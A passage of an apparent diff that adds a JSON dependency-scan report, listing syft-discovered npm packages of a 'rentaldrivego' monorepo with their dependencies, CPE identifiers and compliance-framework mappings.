"raw": { + "id": "3103913e34f4201d", + "name": "@react-pdf/types", + "version": "2.11.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/types:\\@react-pdf\\/types:2.11.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/types:\\@react_pdf\\/types:2.11.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/types:\\@react-pdf\\/types:2.11.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/types:\\@react_pdf\\/types:2.11.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/types:2.11.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/types:2.11.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/types@2.11.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/types/-/types-2.11.1.tgz", + "integrity": "sha512-i9xQgfaDU9QoeNnbp6rltXCWg1huEh195rpOuN8cE4BZ2FuLdQrsIcb2dhFF9aOxXf+XBA6LOSpIW051MDD/bw==", + "dependencies": { + "@react-pdf/font": "^4.0.8", + "@react-pdf/primitives": "^4.3.0", + "@react-pdf/stylesheet": "^6.2.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f5a58400fb5d806d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @rentaldrivego/admin 1.0.0", + "title": "@rentaldrivego/admin 1.0.0", + "description": "Package discovered: @rentaldrivego/admin 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2a2c690594e77e74", + "name": "@rentaldrivego/admin", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/admin:\\@rentaldrivego\\/admin:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40rentaldrivego/admin@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "", + "integrity": "", + "dependencies": { + "@rentaldrivego/types": "*", + "autoprefixer": "^10.4.19", + "dayjs": "^1.11.11", + "lucide-react": "^0.376.0", + "next": "14.2.3", + "postcss": "^8.4.38", + "react": "^18.3.1", + "react-dom": "^18.3.1", + "recharts": "^2.12.7", + "tailwindcss": "^3.4.3", + "zod": "^3.23.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b0c291ec8410a1be", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @rentaldrivego/admin UNKNOWN", + "title": "@rentaldrivego/admin UNKNOWN", + "description": "Package discovered: @rentaldrivego/admin UNKNOWN", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "22655bafcebdfea4", + "name": "@rentaldrivego/admin", + "version": "UNKNOWN", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/admin:\\@rentaldrivego\\/admin:*:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40rentaldrivego/admin", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "apps/admin", + "integrity": "", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "28e1ac461cbd16df", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @rentaldrivego/api 1.0.0", + "title": "@rentaldrivego/api 1.0.0", + "description": "Package discovered: @rentaldrivego/api 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "51dda2f8a6d52783", + "name": "@rentaldrivego/api", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/api:\\@rentaldrivego\\/api:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40rentaldrivego/api@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "", + "integrity": "", + "dependencies": { + "@react-pdf/renderer": "^3.4.3", + "@rentaldrivego/database": "*", + "@rentaldrivego/types": "*", + "bcryptjs": "^2.4.3", + "cors": "^2.8.5", + "dayjs": "^1.11.11", + "express": "^4.19.2", + "express-rate-limit": "^8.5.1", + "firebase-admin": "^12.1.0", + "helmet": "^7.1.0", + "ioredis": "^5.3.2", + "jsonwebtoken": "^9.0.2", + "morgan": "^1.10.0", + "multer": "^1.4.5-lts.1", + "node-cron": "^3.0.3", + "nodemailer": "^6.9.16", + "otplib": "^12.0.1", + "qrcode": "^1.5.3", + "react": "^18.3.1", + "react-dom": "^18.3.1", + "resend": "^3.2.0", + "socket.io": "^4.7.5", + "twilio": "^5.1.0", + "zod": "^3.23.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8fa1f2444979ec05", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @rentaldrivego/api UNKNOWN", + "title": "@rentaldrivego/api UNKNOWN", + "description": "Package discovered: @rentaldrivego/api UNKNOWN", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "731fc15901c69a78", + "name": "@rentaldrivego/api", + "version": "UNKNOWN", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/api:\\@rentaldrivego\\/api:*:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40rentaldrivego/api", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "apps/api", + "integrity": "", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "5e204c38947c3756", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @rentaldrivego/dashboard 1.0.0", + "title": "@rentaldrivego/dashboard 1.0.0", + "description": "Package discovered: @rentaldrivego/dashboard 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "fb550e5d7052cd7e", + "name": "@rentaldrivego/dashboard", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/dashboard:\\@rentaldrivego\\/dashboard:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40rentaldrivego/dashboard@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "", + "integrity": "", + "dependencies": { + "@rentaldrivego/types": "*", + "autoprefixer": "^10.4.19", + "dayjs": "^1.11.11", + "lucide-react": "^0.376.0", + "next": "14.2.3", + "postcss": "^8.4.38", + "react": "^18.3.1", + "react-dom": "^18.3.1", + "recharts": "^2.12.7", + "sharp": "^0.34.5", + "socket.io-client": "^4.7.5", + "tailwindcss": "^3.4.3", + "zod": "^3.23.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f5ec61dae5249a19", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @rentaldrivego/dashboard UNKNOWN", + "title": "@rentaldrivego/dashboard UNKNOWN", + "description": "Package discovered: @rentaldrivego/dashboard UNKNOWN", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "8302af283dd2fb59", + "name": "@rentaldrivego/dashboard", + "version": "UNKNOWN", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/dashboard:\\@rentaldrivego\\/dashboard:*:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40rentaldrivego/dashboard", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "apps/dashboard", + "integrity": "", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "71d8c650760061fb", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @rentaldrivego/database 1.0.0", + "title": "@rentaldrivego/database 1.0.0", + "description": "Package discovered: @rentaldrivego/database 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "bd8906fc40f841ac", + "name": "@rentaldrivego/database", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/database:\\@rentaldrivego\\/database:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40rentaldrivego/database@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "", + "integrity": "", + "dependencies": { + "@prisma/client": "^5.13.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8b90575e8ea88bd4", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @rentaldrivego/database UNKNOWN", + "title": "@rentaldrivego/database UNKNOWN", + "description": "Package discovered: @rentaldrivego/database UNKNOWN", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2bdca263d566c09a", + "name": "@rentaldrivego/database", + "version": "UNKNOWN", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/database:\\@rentaldrivego\\/database:*:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40rentaldrivego/database", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "packages/database", + "integrity": "", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8a8bb5bfb12506b1", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @rentaldrivego/marketplace 1.0.0", + "title": "@rentaldrivego/marketplace 1.0.0", + "description": "Package discovered: @rentaldrivego/marketplace 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "71e9d3c366707710", + "name": "@rentaldrivego/marketplace", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@rentaldrivego\\/marketplace:\\@rentaldrivego\\/marketplace:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40rentaldrivego/marketplace@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "", + "integrity": "", + "dependencies": { + "@rentaldrivego/types": "*", + "autoprefixer": "^10.4.19", + "dayjs": "^1.11.11", + "lucide-react": "^0.376.0", + "next": "14.2.3", + "postcss": "^8.4.38", + "react": "^18.3.1", + "react-dom": "^18.3.1", + "tailwindcss": "^3.4.3", + "zod": "^3.23.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", 